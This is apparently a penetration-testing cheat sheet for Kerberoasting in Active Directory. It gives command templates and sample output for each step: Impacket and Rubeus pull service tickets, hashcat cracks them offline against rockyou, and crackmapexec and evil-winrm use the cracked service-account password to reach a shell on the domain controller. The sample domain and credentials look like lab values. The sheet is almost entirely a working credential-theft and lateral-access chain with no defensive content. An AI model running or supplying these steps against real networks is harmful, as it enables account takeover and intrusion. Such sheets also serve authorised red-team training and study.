KERBEROASTING

Request service tickets

Get TGS tickets for SPNs — Any domain user can do this

impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <DC_IP> -request -outputfile kerberoast.txt
Example Output
impacket-GetUserSPNs corp.local/john:Password1 -dc-ip 10.10.10.5 -request
$krb5tgs$23$*svc_sql$CORP.LOCAL$...

hashcat -m 13100 hash.txt rockyou.txt
svc_sql:SQLServiceP@ss!
(Kerberoasted service account password)

Kerberoast with Rubeus

From Windows foothold — Alternative to impacket

.\Rubeus.exe kerberoast /outfile:kerberoast.txt
Example Output
.\Rubeus.exe kerberoast /outfile:hashes.txt
[*] Found 2 Kerberoastable users
[*] SPN: MSSQLSvc/DB01:1433 - svc_sql
[*] Hash written to hashes.txt

Crack TGS hashes

Offline cracking — Service account passwords

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
Example Output
hashcat -m 13100 hashes.txt rockyou.txt
$krb5tgs$23$*svc_sql*:SQLServiceP@ss!

Status: Cracked
Hash.Target: svc_sql
Password: SQLServiceP@ss!

Use cracked password

Access with service account — Often has high privileges

crackmapexec smb <DC_IP> -u <svc_account> -p <cracked_pass>
evil-winrm if WinRM is open
Example Output
crackmapexec smb 10.10.10.5 -u svc_sql -p 'SQLServiceP@ss!'
[+] corp.local\svc_sql:SQLServiceP@ss! (Pwn3d!)

evil-winrm -i 10.10.10.5 -u svc_sql -p 'SQLServiceP@ss!'
*Evil-WinRM* PS> whoami
corp\svc_sql